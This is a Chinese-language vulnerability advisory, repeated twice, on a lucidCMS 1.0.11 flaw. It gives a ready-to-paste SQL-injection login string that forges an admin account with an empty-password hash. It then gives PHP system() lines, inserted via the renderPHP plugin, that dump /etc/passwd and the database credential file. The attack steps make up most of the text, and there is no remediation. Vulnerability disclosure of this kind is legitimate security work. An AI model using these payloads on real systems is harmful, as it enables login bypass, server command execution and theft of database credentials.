lucidCMS是一款简单灵活的内容管理系统。 lucidCMS 1.0.11 允许攻击者通过登录框执行任意的SQL指令。 lucidCMS中存在多个输入验证错误: 1) 如果关闭魔术引号的话就会导致SQL注入: 在登录表单中输入以下内容,以管理员登录: 登录:\'\'UNION(SELECT\'\'1\'\',\'\'admin\'\',\'\'admin\'\',\'\'FAKE@hotmail.com\'\',\'\'d41d8cd98f00b204e9800998ecf8427e\'\',\'\'1\'\')/* 口令:无 ^ | | 这是哈希 md5(\'\'\'\')的结果 注意:登录中没有空格 登录请求变为: SELECT * FROM lucid_users WHERE name=\'\'\'\'UNION(SELECT\'\'1\'\',\'\'admin\'\',\'\'admin\'\',\'\'FAKE@hotmail.com\'\',\'\'d41d8cd98f00b204e9800998ecf8427e\'\',\'\'1\'\')/*\'\' 2) 现在新的管理员就可以编辑模板、注入恶意javascript代码、查看phpinfo()、管理用户/组、激活/禁用插件。攻击者可以激活renderPHP插件,在主样式表末尾添加以下行: <?php error_reporting(0); system(\'\'cat /etc/passwd > temp.txt\'\'); ?> 查看/etc/passwd文件: <?php error_reporting(0); system(\'\'cat dBConfig.php > temp.txt\'\'); ?> 查看数据库用户名/口令、数据库名称和表格前缀,这样就可以完全控制数据库系统。
lucidCMS是一款简单灵活的内容管理系统。 lucidCMS 1.0.11 允许攻击者通过登录框执行任意的SQL指令。 lucidCMS中存在多个输入验证错误: 1) 如果关闭魔术引号的话就会导致SQL注入: 在登录表单中输入以下内容,以管理员登录: 登录:\'\'UNION(SELECT\'\'1\'\',\'\'admin\'\',\'\'admin\'\',\'\'FAKE@hotmail.com\'\',\'\'d41d8cd98f00b204e9800998ecf8427e\'\',\'\'1\'\')/* 口令:无 ^ | | 这是哈希 md5(\'\'\'\')的结果 注意:登录中没有空格 登录请求变为: SELECT * FROM lucid_users WHERE name=\'\'\'\'UNION(SELECT\'\'1\'\',\'\'admin\'\',\'\'admin\'\',\'\'FAKE@hotmail.com\'\',\'\'d41d8cd98f00b204e9800998ecf8427e\'\',\'\'1\'\')/*\'\' 2) 现在新的管理员就可以编辑模板、注入恶意javascript代码、查看phpinfo()、管理用户/组、激活/禁用插件。攻击者可以激活renderPHP插件,在主样式表末尾添加以下行: <?php error_reporting(0); system(\'\'cat /etc/passwd > temp.txt\'\'); ?> 查看/etc/passwd文件: <?php error_reporting(0); system(\'\'cat dBConfig.php > temp.txt\'\'); ?> 查看数据库用户名/口令、数据库名称和表格前缀,这样就可以完全控制数据库系统。